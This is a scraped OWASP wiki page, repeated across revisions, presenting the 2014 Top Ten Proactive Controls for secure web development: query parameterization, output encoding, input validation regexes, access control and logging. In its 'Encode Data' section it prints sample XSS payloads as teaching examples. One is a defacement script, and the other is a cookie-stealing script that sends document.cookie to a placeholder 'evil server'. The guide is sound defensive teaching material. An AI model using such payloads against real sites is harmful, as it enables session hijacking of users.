Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176355OWASP Proactive Controls2014-06-03T20:18:13Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
